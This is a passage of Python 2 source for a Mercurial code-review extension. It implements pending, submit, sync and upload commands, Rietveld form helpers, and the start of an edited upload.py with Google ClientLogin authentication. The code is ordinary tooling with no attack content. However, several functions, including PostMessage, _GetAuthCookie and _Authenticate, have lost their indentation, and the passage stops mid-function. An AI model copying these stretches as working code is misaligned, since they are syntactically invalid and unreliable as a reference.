		cl.cc = Sub(cl.cc, defaultcc)
		cl.reviewer = defaultcc
		cl.Flush(ui, repo)
	if cl.files == []:
		return "no changed files, not sending mail"
	cl.Mail(ui, repo)
#######################################################################
# hg p / hg pq / hg ps / hg pending
def ps(ui, repo, *pats, **opts):
	"""alias for hg p --short
	"""
	# Force the short listing form, then delegate to pending.
	opts.update(short=True)
	return pending(ui, repo, *pats, **opts)
def pq(ui, repo, *pats, **opts):
	"""alias for hg p --quick
	"""
	# Force the quick (no-server) mode, then delegate to pending.
	opts.update(quick=True)
	return pending(ui, repo, *pats, **opts)
def pending(ui, repo, *pats, **opts):
	"""show pending changes
	Lists pending changes followed by a list of unassigned but modified files.
	"""
	if codereview_disabled:
		return codereview_disabled
	quick = opts.get('quick', False)
	short = opts.get('short', False)
	# --quick/--short skip the slow per-CL fetch from the Rietveld server.
	m = LoadAllCL(ui, repo, web=not quick and not short)
	# Python 2: keys() returns a list, sorted in place for stable output.
	names = m.keys()
	names.sort()
	for name in names:
		cl = m[name]
		if short:
			ui.write(name + "\t" + line1(cl.desc) + "\n")
		else:
			ui.write(cl.PendingText(quick=quick) + "\n")
	if short:
		return
	# Trailing section: modified files not assigned to any CL.
	files = DefaultFiles(ui, repo, [])
	if len(files) > 0:
		s = "Changed files not in any CL:\n"
		for f in files:
			s += "\t" + f + "\n"
		ui.write(s)
#######################################################################
# hg submit
def need_sync():
	# Single point of abort for every "local repo is stale" condition.
	raise hg_util.Abort("local repository out of date; must sync before submit")
def submit(ui, repo, *pats, **opts):
	"""submit change to remote repository
	Submits change to remote repository.
	Bails out if the local repository is not in sync with the remote one.
	"""
	if codereview_disabled:
		return codereview_disabled
	# We already called this on startup but sometimes Mercurial forgets.
	set_mercurial_encoding_to_utf8()
	if not opts["no_incoming"] and hg_incoming(ui, repo):
		need_sync()
	cl, err = CommandLineCL(ui, repo, pats, opts, defaultcc=defaultcc)
	if err != "":
		return err
	# For a clpatched CL, the original author is the committer of record.
	user = None
	if cl.copied_from:
		user = cl.copied_from
	userline = CheckContributor(ui, repo, user)
	typecheck(userline, str)
	# Build the R=/TBR=/CC= trailer appended to the commit message.
	about = ""
	if cl.reviewer:
		about += "R=" + JoinComma([CutDomain(s) for s in cl.reviewer]) + "\n"
	if opts.get('tbr'):
		tbr = SplitCommaSpace(opts.get('tbr'))
		cl.reviewer = Add(cl.reviewer, tbr)
		about += "TBR=" + JoinComma([CutDomain(s) for s in tbr]) + "\n"
	if cl.cc:
		about += "CC=" + JoinComma([CutDomain(s) for s in cl.cc]) + "\n"
	if not cl.reviewer:
		return "no reviewers listed in CL"
	if not cl.local:
		return "cannot submit non-local CL"
	# upload, to sync current patch and also get change number if CL is new.
	if not cl.copied_from:
		cl.Upload(ui, repo, gofmt_just_warn=True)
	# check gofmt for real; allowed upload to warn in order to save CL.
	cl.Flush(ui, repo)
	CheckFormat(ui, repo, cl.files)
	about += "%s%s\n" % (server_url_base, cl.name)
	if cl.copied_from:
		about += "\nCommitter: " + CheckContributor(ui, repo, None) + "\n"
	typecheck(about, str)
	if not cl.mailed and not cl.copied_from: # in case this is TBR
		cl.Mail(ui, repo)
	# submit changes locally
	message = cl.desc.rstrip() + "\n\n" + about
	typecheck(message, str)
	set_status("pushing " + cl.name + " to remote server")
	if hg_outgoing(ui, repo):
		raise hg_util.Abort("local repository corrupt or out-of-phase with remote: found outgoing changes")
	old_heads = len(hg_heads(ui, repo).split())
	# Temporarily allow the commit past our own precommit hook.
	global commit_okay
	commit_okay = True
	ret = hg_commit(ui, repo, *['path:'+f for f in cl.files], message=message, user=userline)
	commit_okay = False
	if ret:
		return "nothing changed"
	node = repo["-1"].node()
	# push to remote; if it fails for any reason, roll back
	try:
		new_heads = len(hg_heads(ui, repo).split())
		if old_heads != new_heads:
			# Created new head, so we weren't up to date.
			need_sync()
		# Push changes to remote. If it works, we're committed. If not, roll back.
		try:
			hg_push(ui, repo)
		except hg_error.Abort, e:
			if e.message.find("push creates new heads") >= 0:
				# Remote repository had changes we missed.
				need_sync()
			raise
	except:
		# Undo the local commit so the working state matches the remote.
		real_rollback()
		raise
	# We're committed. Upload final patch, close review, add commit message.
	changeURL = hg_node.short(node)
	url = ui.expandpath("default")
	m = re.match("^https?://([^@/]+@)?([^.]+)\.googlecode\.com/hg/?", url)
	if m:
		changeURL = "http://code.google.com/p/%s/source/detail?r=%s" % (m.group(2), changeURL)
	else:
		print >>sys.stderr, "URL: ", url
	pmsg = "*** Submitted as " + changeURL + " ***\n\n" + message
	# When posting, move reviewers to CC line,
	# so that the issue stops showing up in their "My Issues" page.
	PostMessage(ui, cl.name, pmsg, reviewers="", cc=JoinComma(cl.reviewer+cl.cc))
	if not cl.copied_from:
		EditDesc(cl.name, closed=True, private=cl.private)
	cl.Delete(ui, repo)
	# If we just submitted the release branch's last pending work
	# from a clean tree, hop back to the default branch.
	c = repo[None]
	if c.branch() == releaseBranch and not c.modified() and not c.added() and not c.removed():
		ui.write("switching from %s to default branch.\n" % releaseBranch)
		err = hg_clean(repo, "default")
		if err:
			return err
	return None
#######################################################################
# hg sync
def sync(ui, repo, **opts):
	"""synchronize with remote repository
	Incorporates recent changes from the remote repository
	into the local repository.
	"""
	if codereview_disabled:
		return codereview_disabled
	# --local skips the pull and only reconciles CL state below.
	if not opts["local"]:
		err = hg_pull(ui, repo, update=True)
		if err:
			return err
	sync_changes(ui, repo)
def sync_changes(ui, repo):
	# Look through recent change log descriptions to find
	# potential references to http://.*/our-CL-number.
	# Double-check them by looking at the Rietveld log.
	for rev in hg_log(ui, repo, limit=100, template="{node}\n").split():
		desc = repo[rev].description().strip()
		for clname in re.findall('(?m)^http://(?:[^\n]+)/([0-9]+)$', desc):
			if IsLocalCL(ui, repo, clname) and IsRietveldSubmitted(ui, clname, repo[rev].hex()):
				# A pending local CL matches a submitted commit:
				# close the review and delete the local record.
				ui.warn("CL %s submitted as %s; closing\n" % (clname, repo[rev]))
				cl, err = LoadCL(ui, repo, clname, web=False)
				if err != "":
					ui.warn("loading CL %s: %s\n" % (clname, err))
					continue
				if not cl.copied_from:
					EditDesc(cl.name, closed=True, private=cl.private)
				cl.Delete(ui, repo)
	# Remove files that are not modified from the CLs in which they appear.
	all = LoadAllCL(ui, repo, web=False)
	changed = ChangedFiles(ui, repo, [])
	for cl in all.values():
		extra = Sub(cl.files, changed)
		if extra:
			ui.warn("Removing unmodified files from CL %s:\n" % (cl.name,))
			for f in extra:
				ui.warn("\t%s\n" % (f,))
			cl.files = Sub(cl.files, extra)
			cl.Flush(ui, repo)
		if not cl.files:
			# An emptied CL is only reported, never deleted automatically.
			if not cl.copied_from:
				ui.warn("CL %s has no files; delete (abandon) with hg change -d %s\n" % (cl.name, cl.name))
			else:
				ui.warn("CL %s has no files; delete locally with hg change -D %s\n" % (cl.name, cl.name))
	return
#######################################################################
# hg upload
def upload(ui, repo, name, **opts):
	"""upload diffs to the code review server
	Uploads the current modifications for a given change to the server.
	"""
	if codereview_disabled:
		return codereview_disabled
	# Quiet the repo's own ui so only our final URL line is printed.
	repo.ui.quiet = True
	cl, err = LoadCL(ui, repo, name, web=True)
	if err != "":
		return err
	if not cl.local:
		return "cannot upload non-local change"
	cl.Upload(ui, repo)
	print "%s%s\n" % (server_url_base, cl.name)
	return
#######################################################################
# Table of commands, supplied to Mercurial for installation.
# Options shared by the mail and submit commands.
review_opts = [
	('r', 'reviewer', '', 'add reviewer'),
	('', 'cc', '', 'add cc'),
	('', 'tbr', '', 'add future reviewer'),
	('m', 'message', '', 'change description (for new change)'),
]
# Mercurial command table: name -> (function, option list, synopsis).
cmdtable = {
	# The ^ means to show this command in the help text that
	# is printed when running hg with no arguments.
	"^change": (
		change,
		[
			('d', 'delete', None, 'delete existing change list'),
			('D', 'deletelocal', None, 'delete locally, but do not change CL on server'),
			('i', 'stdin', None, 'read change list from standard input'),
			('o', 'stdout', None, 'print change list to standard output'),
			('p', 'pending', None, 'print pending summary to standard output'),
		],
		"[-d | -D] [-i] [-o] change# or FILE ..."
	),
	"^clpatch": (
		clpatch,
		[
			('', 'ignore_hgpatch_failure', None, 'create CL metadata even if hgpatch fails'),
			('', 'no_incoming', None, 'disable check for incoming changes'),
		],
		"change#"
	),
	# Would prefer to call this codereview-login, but then
	# hg help codereview prints the help for this command
	# instead of the help for the extension.
	"code-login": (
		code_login,
		[],
		"",
	),
	"^download": (
		download,
		[],
		"change#"
	),
	"^file": (
		file,
		[
			('d', 'delete', None, 'delete files from change list (but not repository)'),
		],
		"[-d] change# FILE ..."
	),
	"^gofmt": (
		gofmt,
		[
			('l', 'list', None, 'list files that would change, but do not edit them'),
		],
		"FILE ..."
	),
	"^pending|p": (
		pending,
		[
			('s', 'short', False, 'show short result form'),
			('', 'quick', False, 'do not consult codereview server'),
		],
		"[FILE ...]"
	),
	"^ps": (
		ps,
		[],
		"[FILE ...]"
	),
	"^pq": (
		pq,
		[],
		"[FILE ...]"
	),
	"^mail": (
		mail,
		review_opts + [
		] + hg_commands.walkopts,
		"[-r reviewer] [--cc cc] [change# | file ...]"
	),
	"^release-apply": (
		release_apply,
		[
			('', 'ignore_hgpatch_failure', None, 'create CL metadata even if hgpatch fails'),
			('', 'no_incoming', None, 'disable check for incoming changes'),
		],
		"change#"
	),
	# TODO: release-start, release-tag, weekly-tag
	"^submit": (
		submit,
		review_opts + [
			('', 'no_incoming', None, 'disable initial incoming check (for testing)'),
		] + hg_commands.walkopts + hg_commands.commitopts + hg_commands.commitopts2,
		"[-r reviewer] [--cc cc] [change# | file ...]"
	),
	"^sync": (
		sync,
		[
			('', 'local', None, 'do not pull changes from remote repository')
		],
		"[--local]",
	),
	"^undo": (
		undo,
		[
			('', 'ignore_hgpatch_failure', None, 'create CL metadata even if hgpatch fails'),
			('', 'no_incoming', None, 'disable check for incoming changes'),
		],
		"change#"
	),
	"^upload": (
		upload,
		[],
		"change#"
	),
}
#######################################################################
# Mercurial extension initialization
def norollback(*pats, **opts):
	"""(disabled when using this extension)"""
	# Installed over repo.rollback by reposetup: rollback would remove a
	# commit behind this extension's back, so force use of hg undo instead.
	raise hg_util.Abort("codereview extension enabled; use undo instead of rollback")
def reposetup(ui, repo):
	# Mercurial extension hook, run once per repository: reads the
	# repo-local config, wires up the Rietveld client, and disables
	# commands that could modify history behind our back.
	global codereview_disabled
	global defaultcc
	repo_config_path = ''
	# Read repository-specific options from lib/codereview/codereview.cfg
	try:
		repo_config_path = repo.root + '/lib/codereview/codereview.cfg'
		f = open(repo_config_path)
		for line in f:
			if line.startswith('defaultcc: '):
				# NOTE(review): line[10:] keeps the space after the colon;
				# presumably SplitCommaSpace tolerates leading spaces — confirm.
				defaultcc = SplitCommaSpace(line[10:])
	except:
		# If there are no options, chances are good this is not
		# a code review repository; stop now before we foul
		# things up even worse. Might also be that repo doesn't
		# even have a root. See issue 959.
		if repo_config_path == '':
			codereview_disabled = 'codereview disabled: repository has no root'
		else:
			codereview_disabled = 'codereview disabled: cannot open ' + repo_config_path
		return
	InstallMatch(ui, repo)
	ReadContributors(ui, repo)
	RietveldSetup(ui, repo)
	# Disable the Mercurial commands that might change the repository.
	# Only commands in this extension are supposed to do that.
	ui.setconfig("hooks", "precommit.codereview", precommithook)
	# Rollback removes an existing commit. Don't do that either.
	global real_rollback
	real_rollback = repo.rollback
	repo.rollback = norollback
#######################################################################
# Wrappers around upload.py for interacting with Rietveld
from HTMLParser import HTMLParser
# HTML form parser
class FormParser(HTMLParser):
	"""Collects the name/value pairs of <input> and <textarea> elements
	into self.map, so Rietveld's edit/publish forms can be replayed."""
	def __init__(self):
		self.map = {}		# field name -> field value
		self.curtag = None	# name of the <textarea> currently open, if any
		self.curdata = None	# text accumulated for curtag
		HTMLParser.__init__(self)
	def handle_starttag(self, tag, attrs):
		# <input name=... value=...> yields a complete pair immediately;
		# <textarea name=...> starts accumulating character data.
		if tag == "input":
			key = None
			value = ''
			for a in attrs:
				if a[0] == 'name':
					key = a[1]
				if a[0] == 'value':
					value = a[1]
			if key is not None:
				self.map[key] = value
		if tag == "textarea":
			key = None
			for a in attrs:
				if a[0] == 'name':
					key = a[1]
			if key is not None:
				self.curtag = key
				self.curdata = ''
	def handle_endtag(self, tag):
		# Closing </textarea> commits the accumulated text.
		if tag == "textarea" and self.curtag is not None:
			self.map[self.curtag] = self.curdata
			self.curtag = None
			self.curdata = None
	def handle_charref(self, name):
		# Numeric character references (&#NN;) become literal characters.
		self.handle_data(unichr(int(name)))
	def handle_entityref(self, name):
		# Known named entities are expanded; unknown ones pass through verbatim.
		import htmlentitydefs
		if name in htmlentitydefs.entitydefs:
			self.handle_data(htmlentitydefs.entitydefs[name])
		else:
			self.handle_data("&" + name + ";")
	def handle_data(self, data):
		# Only collect text while inside a <textarea>.
		if self.curdata is not None:
			self.curdata += data
def JSONGet(ui, path):
	# Fetch path from the Rietveld server and decode it as JSON.
	# Any failure (network, auth, parse) warns and returns None.
	try:
		data = MySend(path, force_auth=False)
		typecheck(data, str)
		d = fix_json(json.loads(data))
	except:
		ui.warn("JSONGet %s: %s\n" % (path, ExceptionDetail()))
		return None
	return d
# Clean up json parser output to match our expectations:
#   * all strings are UTF-8-encoded str, not unicode.
#   * missing fields are missing, not None,
#     so that d.get("foo", defaultvalue) works.
def fix_json(x):
	# Scalars pass through (strings get CRLF-normalized below).
	if type(x) in (str, int, float, bool, type(None)):
		pass
	elif type(x) is unicode:
		# Recode unicode into a UTF-8 byte string.
		x = x.encode("utf-8")
	elif type(x) is list:
		# Fix each element in place, keeping the same list object.
		for i, elem in enumerate(x):
			x[i] = fix_json(elem)
	elif type(x) is dict:
		# Drop None-valued keys so d.get(key, default) works,
		# fixing the remaining values in place.
		for key in list(x.keys()):
			if x[key] is None:
				del x[key]
			else:
				x[key] = fix_json(x[key])
	else:
		raise hg_util.Abort("unknown type " + str(type(x)) + " in fix_json")
	# Normalize Windows line endings in any resulting byte string.
	if type(x) is str:
		x = x.replace('\r\n', '\n')
	return x
def IsRietveldSubmitted(ui, clname, hex):
	# Ask Rietveld for the issue's message log and look for the
	# "*** Submitted as <hash> ***" marker matching the commit hex.
	resp = JSONGet(ui, "/api/" + clname + "?messages=true")
	if resp is None:
		return False
	marker = re.compile('\*\*\* Submitted as [^*]*?([0-9a-f]+) \*\*\*')
	for msg in resp.get("messages", []):
		match = marker.match(msg.get("text", ""))
		# Require at least 8 hex digits and a prefix match on the commit.
		if match is not None and len(match.group(1)) >= 8 and hex.startswith(match.group(1)):
			return True
	return False
def IsRietveldMailed(cl):
	# A CL counts as mailed once any Rietveld message carries the
	# standard review-request boilerplate text.
	for message in cl.dict.get("messages", []):
		text = message.get("text", "")
		if text.find("I'd like you to review this change") >= 0:
			return True
	return False
def DownloadCL(ui, repo, clname):
	# Fetch a CL and its newest patchset diff from Rietveld.
	# Returns (cl, vers, diffdata, err): vers is the hg revision the
	# diff was made against ("" if unknown); err is "" on success.
	set_status("downloading CL " + clname)
	cl, err = LoadCL(ui, repo, clname, web=True)
	if err != "":
		return None, None, None, "error loading CL %s: %s" % (clname, err)
	# Find most recent diff
	diffs = cl.dict.get("patchsets", [])
	if not diffs:
		return None, None, None, "CL has no patch sets"
	patchid = diffs[-1]
	patchset = JSONGet(ui, "/api/" + clname + "/" + str(patchid))
	if patchset is None:
		return None, None, None, "error loading CL patchset %s/%d" % (clname, patchid)
	if patchset.get("patchset", 0) != patchid:
		return None, None, None, "malformed patchset information"
	# The patchset message records "diff -r <vers> ..." when the
	# uploader's base revision is known.
	vers = ""
	msg = patchset.get("message", "").split()
	if len(msg) >= 3 and msg[0] == "diff" and msg[1] == "-r":
		vers = msg[2]
	diff = "/download/issue" + clname + "_" + str(patchid) + ".diff"
	diffdata = MySend(diff, force_auth=False)
	# Print warning if email is not in CONTRIBUTORS file.
	email = cl.dict.get("owner_email", "")
	if not email:
		return None, None, None, "cannot find owner for %s" % (clname)
	him = FindContributor(ui, repo, email)
	me = FindContributor(ui, repo, None)
	if him == me:
		# Downloading my own CL: preserve its mailed state.
		cl.mailed = IsRietveldMailed(cl)
	else:
		# Someone else's CL: remember the original author.
		cl.copied_from = email
	return cl, vers, diffdata, ""
def MySend(request_path, payload=None,
		content_type="application/octet-stream",
		timeout=None, force_auth=True,
		**kwargs):
	"""Run MySend1 maybe twice, because Rietveld is unreliable."""
	try:
		return MySend1(request_path, payload, content_type, timeout, force_auth, **kwargs)
	except Exception, e:
		# Retry exactly once, and only for a server-side 500.
		if type(e) != urllib2.HTTPError or e.code != 500: # only retry on HTTP 500 error
			raise
		print >>sys.stderr, "Loading "+request_path+": "+ExceptionDetail()+"; trying again in 2 seconds."
		time.sleep(2)
		return MySend1(request_path, payload, content_type, timeout, force_auth, **kwargs)
# Like upload.py Send but only authenticates when the
# redirect is to www.google.com/accounts. This keeps
# unnecessary redirects from happening during testing.
def MySend1(request_path, payload=None,
		content_type="application/octet-stream",
		timeout=None, force_auth=True,
		**kwargs):
	"""Sends an RPC and returns the response.
	Args:
		request_path: The path to send the request to, eg /api/appversion/create.
		payload: The body of the request, or None to send an empty request.
		content_type: The Content-Type header to use.
		timeout: timeout in seconds; default None i.e. no timeout.
			(Note: for large requests on OS X, the timeout doesn't work right.)
		kwargs: Any keyword arguments are converted into query string parameters.
	Returns:
		The response body, as a string.
	"""
	# TODO: Don't require authentication. Let the server say
	# whether it is necessary.
	global rpc
	if rpc == None:
		# Lazily create the shared RPC server on first use.
		rpc = GetRpcServer(upload_options)
	self = rpc
	if not self.authenticated and force_auth:
		self._Authenticate()
	if request_path is None:
		return
	# Temporarily install the caller's socket timeout for this request.
	old_timeout = socket.getdefaulttimeout()
	socket.setdefaulttimeout(timeout)
	try:
		tries = 0
		while True:
			tries += 1
			args = dict(kwargs)
			url = "http://%s%s" % (self.host, request_path)
			if args:
				url += "?" + urllib.urlencode(args)
			req = self._CreateRequest(url=url, data=payload)
			req.add_header("Content-Type", content_type)
			try:
				f = self.opener.open(req)
				response = f.read()
				f.close()
				# Translate \r\n into \n, because Rietveld doesn't.
				response = response.replace('\r\n', '\n')
				# who knows what urllib will give us
				if type(response) == unicode:
					response = response.encode("utf-8")
				typecheck(response, str)
				return response
			except urllib2.HTTPError, e:
				if tries > 3:
					raise
				elif e.code == 401:
					# Not (or no longer) authenticated: log in and retry.
					self._Authenticate()
				elif e.code == 302:
					# Only re-authenticate when redirected to Google's
					# login page; otherwise treat the redirect as "done".
					loc = e.info()["location"]
					if not loc.startswith('https://www.google.com/a') or loc.find('/ServiceLogin') < 0:
						return ''
					self._Authenticate()
				else:
					raise
	finally:
		socket.setdefaulttimeout(old_timeout)
def GetForm(url):
	# Fetch a Rietveld HTML form and return its fields as a
	# UTF-8 str -> str dict (textareas have CRLF normalized).
	f = FormParser()
	f.feed(ustr(MySend(url))) # f.feed wants unicode
	f.close()
	# convert back to utf-8 to restore sanity
	m = {}
	for k,v in f.map.items():
		m[k.encode("utf-8")] = v.replace("\r\n", "\n").encode("utf-8")
	return m
def EditDesc(issue, subject=None, desc=None, reviewers=None, cc=None, closed=False, private=False):
	# Update an issue's metadata on Rietveld by replaying its edit form.
	# None arguments leave the server's current value untouched.
	# Exits the process on server error.
	set_status("uploading change to description")
	# Start from the server's current form so hidden fields round-trip.
	form_fields = GetForm("/" + issue + "/edit")
	if subject is not None:
		form_fields['subject'] = subject
	if desc is not None:
		form_fields['description'] = desc
	if reviewers is not None:
		form_fields['reviewers'] = reviewers
	if cc is not None:
		form_fields['cc'] = cc
	if closed:
		form_fields['closed'] = "checked"
	if private:
		form_fields['private'] = "checked"
	ctype, body = EncodeMultipartFormData(form_fields.items(), [])
	response = MySend("/" + issue + "/edit", body, content_type=ctype)
	# Rietveld replies with an empty body on success.
	if response != "":
		print >>sys.stderr, "Error editing description:\n" + "Sent form: \n", form_fields, "\n", response
		sys.exit(2)
def PostMessage(ui, issue, message, reviewers=None, cc=None, send_mail=True, subject=None):
set_status("uploading message")
form_fields = GetForm("/" + issue + "/publish")
if reviewers is not None:
form_fields['reviewers'] = reviewers
if cc is not None:
form_fields['cc'] = cc
if send_mail:
form_fields['send_mail'] = "checked"
else:
del form_fields['send_mail']
if subject is not None:
form_fields['subject'] = subject
form_fields['message'] = message
form_fields['message_only'] = '1' # Don't include draft comments
if reviewers is not None or cc is not None:
form_fields['message_only'] = '' # Must set '' in order to override cc/reviewer
ctype = "applications/x-www-form-urlencoded"
body = urllib.urlencode(form_fields)
response = MySend("/" + issue + "/publish", body, content_type=ctype)
if response != "":
print response
sys.exit(2)
class opt(object):
	# Empty attribute bag: RietveldSetup fills an instance in to mimic
	# upload.py's parsed command-line options object.
	pass
def RietveldSetup(ui, repo):
	# Initialize the module-level Rietveld client state from the
	# Mercurial configuration: server address, upload options, and
	# the repository's current release branch.
	global force_google_account
	global rpc
	global server
	global server_url_base
	global upload_options
	global verbosity
	if not ui.verbose:
		verbosity = 0
	# Config options.
	x = ui.config("codereview", "server")
	if x is not None:
		server = x
	# TODO(rsc): Take from ui.username?
	email = None
	x = ui.config("codereview", "email")
	if x is not None:
		email = x
	server_url_base = "http://" + server + "/"
	testing = ui.config("codereview", "testing")
	force_google_account = ui.configbool("codereview", "force_google_account", False)
	# Build the fake command-line options object that upload.py expects.
	upload_options = opt()
	upload_options.email = email
	upload_options.host = None
	upload_options.verbose = 0
	upload_options.description = None
	upload_options.description_file = None
	upload_options.reviewers = None
	upload_options.cc = None
	upload_options.message = None
	upload_options.issue = None
	upload_options.download_base = False
	upload_options.revision = None
	upload_options.send_mail = False
	upload_options.vcs = None
	upload_options.server = server
	upload_options.save_cookies = True
	if testing:
		# Test mode: no cookie persistence and a fixed identity.
		upload_options.save_cookies = False
		upload_options.email = "test@example.com"
	rpc = None
	# Pick the newest release branch by (string) tag sort.
	global releaseBranch
	tags = repo.branchtags().keys()
	if 'release-branch.r100' in tags:
		# NOTE(rsc): This tags.sort is going to get the wrong
		# answer when comparing release-branch.r99 with
		# release-branch.r100. If we do ten releases a year
		# that gives us 4 years before we have to worry about this.
		raise hg_util.Abort('tags.sort needs to be fixed for release-branch.r100')
	tags.sort()
	for t in tags:
		if t.startswith('release-branch.'):
			releaseBranch = t
#######################################################################
# http://codereview.appspot.com/static/upload.py, heavily edited.
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tool for uploading diffs from a version control system to the codereview app.
Usage summary: upload.py [options] [-- diff_options]
Diff options are passed to the diff command of the underlying system.
Supported version control systems:
Git
Mercurial
Subversion
It is important for Git/Mercurial users to specify a tree/node/branch to diff
against by using the '--rev' option.
"""
# This code is derived from appcfg.py in the App Engine SDK (open source),
# and from ASPN recipe #146306.
import cookielib
import getpass
import logging
import mimetypes
import optparse
import os
import re
import socket
import subprocess
import sys
import urllib
import urllib2
import urlparse
# The md5 module was deprecated in Python 2.5.
try:
from hashlib import md5
except ImportError:
from md5 import md5
try:
import readline
except ImportError:
pass
# The logging verbosity:
# 0: Errors only.
# 1: Status messages.
# 2: Info logs.
# 3: Debug logs.
# (RietveldSetup lowers this to 0 unless hg is run with --verbose.)
verbosity = 1
# Max size of patch or base file.
MAX_UPLOAD_SIZE = 900 * 1024
# whitelist for non-binary filetypes which do not start with "text/"
# .mm (Objective-C) shows up as application/x-freemind on my Linux box.
TEXT_MIMETYPES = [
	'application/javascript',
	'application/x-javascript',
	'application/x-freemind'
]
def GetEmail(prompt):
	"""Prompts the user for their email address and returns it.
	The last used email address is saved to a file and offered up as a suggestion
	to the user. If the user presses enter without typing in anything the last
	used email address is used. If the user enters a new address, it is saved
	for next time we prompt.
	"""
	last_email_file_name = os.path.expanduser("~/.last_codereview_email_address")
	last_email = ""
	if os.path.exists(last_email_file_name):
		# Best-effort read of the cached address; failures are ignored.
		try:
			last_email_file = open(last_email_file_name, "r")
			last_email = last_email_file.readline().strip("\n")
			last_email_file.close()
			prompt += " [%s]" % last_email
		except IOError, e:
			pass
	email = raw_input(prompt + ": ").strip()
	if email:
		# Best-effort save of the new address for next time.
		try:
			last_email_file = open(last_email_file_name, "w")
			last_email_file.write(email)
			last_email_file.close()
		except IOError, e:
			pass
	else:
		# Empty input means "reuse the cached address".
		email = last_email
	return email
def StatusUpdate(msg):
	"""Print a status message to stdout.
	If 'verbosity' is greater than 0, print the message.
	Args:
		msg: The string to print.
	"""
	if verbosity > 0:
		print msg
def ErrorExit(msg):
	"""Print an error message to stderr and exit."""
	print >>sys.stderr, msg
	sys.exit(1)
class ClientLoginError(urllib2.HTTPError):
	"""Raised to indicate there was an error authenticating with ClientLogin."""
	def __init__(self, url, code, msg, headers, args):
		urllib2.HTTPError.__init__(self, url, code, msg, headers, None)
		# args is the parsed key=value response from ClientLogin.
		# NOTE(review): this shadows BaseException.args with a dict —
		# callers rely on .reason instead.
		self.args = args
		# e.g. "BadAuthentication", "CaptchaRequired" — see _Authenticate.
		self.reason = args["Error"]
class AbstractRpcServer(object):
"""Provides a common interface for a simple RPC server."""
	def __init__(self, host, auth_function, host_override=None, extra_headers={}, save_cookies=False):
		"""Creates a new HttpRpcServer.
		Args:
			host: The host to send requests to.
			auth_function: A function that takes no arguments and returns an
				(email, password) tuple when called. Will be called if authentication
				is required.
			host_override: The host header to send to the server (defaults to host).
			extra_headers: A dict of extra headers to append to every request.
			save_cookies: If True, save the authentication cookies to local disk.
				If False, use an in-memory cookiejar instead. Subclasses must
				implement this functionality. Defaults to False.
		"""
		self.host = host
		self.host_override = host_override
		self.auth_function = auth_function
		self.authenticated = False
		# NOTE(review): extra_headers={} is a shared mutable default;
		# harmless here only as long as no caller mutates it.
		self.extra_headers = extra_headers
		self.save_cookies = save_cookies
		# _GetOpener is supplied by the concrete subclass.
		self.opener = self._GetOpener()
		if self.host_override:
			logging.info("Server: %s; Host: %s", self.host, self.host_override)
		else:
			logging.info("Server: %s", self.host)
	def _GetOpener(self):
		"""Returns an OpenerDirector for making HTTP requests.
		Returns:
			A urllib2.OpenerDirector object.
		"""
		# Abstract: concrete subclasses decide cookie handling etc.
		raise NotImplementedError()
	def _CreateRequest(self, url, data=None):
		"""Creates a new urllib request."""
		logging.debug("Creating request for: '%s' with payload:\n%s", url, data)
		req = urllib2.Request(url, data=data)
		# Optionally spoof the Host header (for host_override setups).
		if self.host_override:
			req.add_header("Host", self.host_override)
		# Python 2 dict iteration; attach any caller-supplied headers.
		for key, value in self.extra_headers.iteritems():
			req.add_header(key, value)
		return req
	def _GetAuthToken(self, email, password):
		"""Uses ClientLogin to authenticate the user, returning an auth token.
		Args:
			email: The user's email address
			password: The user's password
		Raises:
			ClientLoginError: If there was an error authenticating with ClientLogin.
			HTTPError: If there was some other form of HTTP error.
		Returns:
			The authentication token returned by ClientLogin.
		"""
		account_type = "GOOGLE"
		if self.host.endswith(".google.com") and not force_google_account:
			# Needed for use inside Google.
			account_type = "HOSTED"
		req = self._CreateRequest(
				url="https://www.google.com/accounts/ClientLogin",
				data=urllib.urlencode({
						"Email": email,
						"Passwd": password,
						"service": "ah",
						"source": "rietveld-codereview-upload",
						"accountType": account_type,
				}),
		)
		try:
			response = self.opener.open(req)
			response_body = response.read()
			# Body is newline-separated key=value pairs; "Auth" is the token.
			response_dict = dict(x.split("=") for x in response_body.split("\n") if x)
			return response_dict["Auth"]
		except urllib2.HTTPError, e:
			if e.code == 403:
				# 403 carries a parseable Error=<reason> body.
				body = e.read()
				response_dict = dict(x.split("=", 1) for x in body.split("\n") if x)
				raise ClientLoginError(req.get_full_url(), e.code, e.msg, e.headers, response_dict)
			else:
				raise
def _GetAuthCookie(self, auth_token):
"""Fetches authentication cookies for an authentication token.
Args:
auth_token: The authentication token returned by ClientLogin.
Raises:
HTTPError: If there was an error fetching the authentication cookies.
"""
# This is a dummy value to allow us to identify when we're successful.
continue_location = "http://localhost/"
args = {"continue": continue_location, "auth": auth_token}
req = self._CreateRequest("http://%s/_ah/login?%s" % (self.host, urllib.urlencode(args)))
try:
response = self.opener.open(req)
except urllib2.HTTPError, e:
response = e
if (response.code != 302 or
response.info()["location"] != continue_location):
raise urllib2.HTTPError(req.get_full_url(), response.code, response.msg, response.headers, response.fp)
self.authenticated = True
def _Authenticate(self):
"""Authenticates the user.
The authentication process works as follows:
1) We get a username and password from the user
2) We use ClientLogin to obtain an AUTH token for the user
(see http://code.google.com/apis/accounts/AuthForInstalledApps.html).
3) We pass the auth token to /_ah/login on the server to obtain an
authentication cookie. If login was successful, it tries to redirect
us to the URL we provided.
If we attempt to access the upload API without first obtaining an
authentication cookie, it returns a 401 response (or a 302) and
directs us to authenticate ourselves with ClientLogin.
"""
for i in range(3):
credentials = self.auth_function()
try:
auth_token = self._GetAuthToken(credentials[0], credentials[1])
except ClientLoginError, e:
if e.reason == "BadAuthentication":
print >>sys.stderr, "Invalid username or password."
continue
if e.reason == "CaptchaRequired":
print >>sys.stderr, (
"Please go to\n"
"https://www.google.com/accounts/DisplayUnlockCaptcha\n"
"and verify you are a human. Then try again.")
break
if e.reason == "NotVerified":
print >>sys.stderr, "Account not verified."
break
if e.reason == "TermsNotAgreed":
print >>sys.stderr, "User has not agreed to TOS."
break
if e.reason == "AccountDeleted":
print >>sys.stderr, "The user account has been deleted."
break
if e.reason == "AccountDisabled":
print >>sys.stderr, "The user account has been disabled."
break
if e.reason == "ServiceDisabled":
print >>sys.stderr, "The user's access to the service has been disabled."
break
if e.reason == "ServiceUnavailable":
